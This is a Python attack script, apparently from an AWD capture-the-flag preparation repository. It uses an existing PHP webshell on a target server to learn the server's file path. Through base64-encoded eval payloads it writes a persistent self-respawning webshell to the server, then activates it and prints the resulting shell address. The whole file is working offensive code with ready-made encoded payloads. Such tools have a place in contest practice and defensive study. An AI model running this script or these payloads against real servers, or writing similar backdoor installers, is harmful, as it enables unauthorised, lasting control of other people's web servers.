Prepare-for-AWD/attack_python/plugin/upload1.py

#!/usr/bin/python
#coding=utf-8

import sys,requests,base64

#获取靶机的绝对路径
def getpath(url,method,passwd):
	data = {}
	if method == "get":
		data[passwd] = '@eval(base64_decode($_GET[z0]));'
		data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
		res = requests.get(url,params=data)
		return res.content.strip()
	elif method == "post" :
		data['pass']='Sn3rtf4ck'
		data[passwd] = '@eval(base64_decode($_POST[z0]));'
		data['z0'] = 'ZWNobyAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107'
		res = requests.post(url,data=data)
		#print data
		return res.content.strip()
	else :
		return 0

#加载要上传的后门内容

def loadfile(filepath):
	try : 
		file = open(filepath,"rb")
		return str(file.read())
	except : 
		print("File %s Not Found!" %filepath)
		sys.exit()

#写马函数
def upload(url,method,passwd):
	#http://127.0.0.1:80/1110/x.php,post,x
	'''
	1.http or https
	2.端口要放在ip变量中
	3.Rfile  /1110/x.php
	'''
	try:
		url.index("http")
		#去除http://   ==> 127.0.0.1:80/1110/x.php
		urlstr=url[7:]
		lis = urlstr.split("/")
		ip=str(lis[0])
		Rfile = ""
		for i in range(1,len(lis)):
			Rfile = Rfile+"/"+str(lis[i])
	except :
		urlstr=url[8:]
		lis = urlstr.split("/")
		ip=str(lis[0])
		Rfile = ""
		for i in range(1,len(lis)):
			Rfile = Rfile+"/"+str(lis[i])
	#判断shell是否存在
	try :
		res = requests.get(url,timeout=10)
	except : 
		print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
		return 0
	if res.status_code!=200 :
		print("[-] %s Page Not Found!" %url)
		return 0

	#加载要写入的内容
	shellPath = "./shell1.php"
	shell_content = loadfile(shellPath)

	#获取靶机的绝对路径
	Rpath = getpath(url,method,passwd)#D:/phpStudy/WWW/1110/x.php
	list0 = Rpath.split("/")
	Rpath = ""
	for i in range(0,(len(list0)-1)):
		Rpath = Rpath+list0[i]+"/"
	data = {}
	#判断method
	if method =="post" :
		data['pass']='Sn3rtf4ck'
		data[passwd] = "@eval(base64_decode($_POST['z0']));"
		data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoxIl0pOyRjPWJhc2U2NF9kZWNvZGUoJF9QT1NUWyJ6MiJdKTskYz1zdHJfcmVwbGFjZSgiXHIiLCIiLCRjKTskYz1zdHJfcmVwbGFjZSgiXG4iLCIiLCRjKTskYnVmPSIiO2ZvcigkaT0wOyRpPHN0cmxlbigkYyk7JGkrPTIpJGJ1Zi49c3Vic3RyKCRjLCRpLDIpO2VjaG8oQGZ3cml0ZShmb3BlbigkZiwndycpLCRidWYpPycxJzonMCcpOztlY2hvKCJYQFkiKTtkaWUoKTs='
		data['z1'] = base64.b64encode(Rpath+"/fuck.php")
		data["z2"] = base64.b64encode(shell_content)
		#print data
		try:
			res = requests.post(url,data=data)
		except:
			print("[-] %s Shell has already been Deleted"%url)
	elif method=="get" :
		data[passwd] = "@eval(base64_decode($_GET['z0']));"
		data['z0'] = 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JGY9YmFzZTY0X2RlY29kZSgkX0dFVFsiejEiXSk7JGM9YmFzZTY0X2RlY29kZSgkX0dFVFsiejIiXSk7JGM9c3RyX3JlcGxhY2UoIlxyIiwiIiwkYyk7JGM9c3RyX3JlcGxhY2UoIlxuIiwiIiwkYyk7JGJ1Zj0iIjtmb3IoJGk9MDskaTxzdHJsZW4oJGMpOyRpKz0yKSRidWYuPXN1YnN0cigkYywkaSwyKTtlY2hvKEBmd3JpdGUoZm9wZW4oJGYsJ3cnKSwkYnVmKT8nMSc6JzAnKTs7ZWNobygiWEBZIik7ZGllKCk7'
		data['z1'] = base64.b64encode(Rpath+"/fuck.php")
		data["z2"] = base64.b64encode(shell_content)
		#在检测url是否存在的时候还存在，而上传文件的时候shell被删掉了。
		try:
			res = requests.post(url,params=data)
		except:
			print("[-] %s Shell has already been Deleted"%url)
	else :
		print("method err!")
		sys.exit()

	#判断是否上传成功,失败直接跳过
	#print res.content
	if res.status_code!=200:
		print("[-] %s upload failed!" %ip)
		return 0

	#激活不死马
	list=Rfile.split("/")
	b_url="http://"+ip
	max = len(list)-1
	for i in range(1,max):
		b_url=b_url+"/"+list[i]
	bsm_url = b_url+"/fuck.php"
	try : 
		res = requests.get(bsm_url,timeout=3)
	except :
		pass
	#尝试访问不死马生成的shell
	shell_url = b_url+"/.index.php"
	res = requests.get(shell_url)
	if res.status_code!=200 :
		print("[-] %s create shell failed!" %bsm_url)
		return 0
	#输出shell地址
	print("[+] %s upload sucessed!" %shell_url)